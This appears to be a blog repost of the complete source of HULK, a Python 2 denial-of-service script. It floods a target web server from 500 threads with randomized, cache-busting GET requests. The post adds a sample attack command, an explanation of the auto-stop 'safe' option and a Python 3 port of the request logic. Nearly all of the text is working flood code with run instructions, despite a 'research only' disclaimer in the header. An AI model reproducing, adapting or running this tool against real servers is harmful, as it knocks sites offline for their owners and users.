A Python-based DoS script

2016-02-06 08:11:12 | Category: Security Tools


Source code (this is the HULK tool: it floods an HTTP server with GET requests whose query string, User-Agent and Referer are randomized on every request, so each request looks unique):
----------------------- cute divider line ----------------------
# ----------------------------------------------------------------------------------------------
# HULK - HTTP Unbearable Load King
#
# this tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them
# to their knees by exhausting the resource pool, its is meant for research purposes only
# and any malicious usage of this tool is prohibited.
#
# author :  Barry Shteiman , version 1.0
# ----------------------------------------------------------------------------------------------
import urllib2
import sys
import threading
import random
import re

#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0

def inc_counter():
    global request_counter
    request_counter+=1

def set_flag(val):
    global flag
    flag=val

def set_safe():
    global safe
    safe=1
# generates a user agent array
def useragent_list():
    global headers_useragents
    headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
    headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
    headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
    return(headers_useragents)

# generates a referer array
def referer_list():
    global headers_referers
    headers_referers.append('http://www.google.com/?q=')
    headers_referers.append('http://www.usatoday.com/search/results?q=')
    headers_referers.append('http://engadget.search.aol.com/search?q=')
    headers_referers.append('http://' + host + '/')
    return(headers_referers)
#builds random ascii string
def buildblock(size):
    out_str = ''
    for i in range(0, size):
        a = random.randint(65, 90)
        out_str += chr(a)
    return(out_str)

def usage():
    print '---------------------------------------------------'
    print 'USAGE: python hulk.py <url>'
    print 'you can add "safe" after url, to autoshut after dos'
    print '---------------------------------------------------'

#http request
def httpcall(url):
    useragent_list()
    referer_list()
    code=0
    if url.count("?")>0:
        param_joiner="&"
    else:
        param_joiner="?"
    request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
    request.add_header('User-Agent', random.choice(headers_useragents))
    request.add_header('Cache-Control', 'no-cache')
    request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
    request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
    request.add_header('Keep-Alive', random.randint(110,120))
    request.add_header('Connection', 'keep-alive')
    request.add_header('Host',host)
    try:
        urllib2.urlopen(request)
    except urllib2.HTTPError, e:
        #print e.code
        set_flag(1)
        print 'Response Code 500'
        code=500
    except urllib2.URLError, e:
        #print e.reason
        sys.exit()
    else:
        inc_counter()
        urllib2.urlopen(request)
    return(code)

#http caller thread 
class HTTPThread(threading.Thread):
    def run(self):
        try:
            while flag<2:
                code=httpcall(url)
                if (code==500) & (safe==1):
                    set_flag(2)
        except Exception, ex:
            pass

# monitors http threads and counts requests
class MonitorThread(threading.Thread):
    def run(self):
        previous=request_counter
        while flag==0:
            if (previous+100<request_counter) & (previous<>request_counter):
                print "%d Requests Sent" % (request_counter)
                previous=request_counter
        if flag==2:
            print "\n-- HULK Attack Finished --"

#execute 
if len(sys.argv) < 2:
    usage()
    sys.exit()
else:
    if sys.argv[1]=="help":
        usage()
        sys.exit()
    else:
        print "-- HULK Attack Started --"
        if len(sys.argv)== 3:
            if sys.argv[2]=="safe":
                set_safe()
        url = sys.argv[1]
        if url.count("/")==2:
            url = url + "/"
        m = re.search('http\://([^/]*)/?.*', url)
        host = m.group(1)
        for i in range(500):
            t = HTTPThread()
            t.start()
        t = MonitorThread()
        t.start()

----------------------- cute divider line ----------------------

Command: xx.py http://xxxx.com safe
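
For reference, the optional "safe" argument only arms the shutdown logic: once a request comes back with an HTTP error, the script sets its flag, the worker threads (which loop while flag<2) stop, and the monitor prints "HULK Attack Finished" — the error response is taken to mean the server has been overwhelmed.

Note that the script above is Python 2 code (urllib2, print statements, the <> operator) and will not run unmodified on Python 3. Below is a minimal sketch of just the core request logic for Python 3, assuming only the standard library's urllib.request; the names random_block and send_request and the placeholder URL http://example.com/ are mine for illustration, not part of the original script.

# Minimal Python 3 sketch of the core request logic only (not the author's code).
import random
import string
import urllib.request

# a couple of example User-Agent strings, same role as useragent_list() above
USER_AGENTS = [
    'Mozilla/5.0 (X11; Linux x86_64; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
    'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
]

def random_block(size):
    # random uppercase ASCII string, same role as buildblock() in the original
    return ''.join(random.choice(string.ascii_uppercase) for _ in range(size))

def send_request(url):
    # append a random, never-repeating query parameter so caches are bypassed
    joiner = '&' if '?' in url else '?'
    full_url = (url + joiner
                + random_block(random.randint(3, 10)) + '='
                + random_block(random.randint(3, 10)))
    req = urllib.request.Request(full_url, headers={
        'User-Agent': random.choice(USER_AGENTS),
        'Cache-Control': 'no-cache',
        'Referer': 'http://www.google.com/?q=' + random_block(random.randint(5, 10)),
    })
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.getcode()

if __name__ == '__main__':
    # a single request against a placeholder URL, for illustration only
    print(send_request('http://example.com/'))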
Please credit the original source when reposting: http://lsaya.blog.163.com/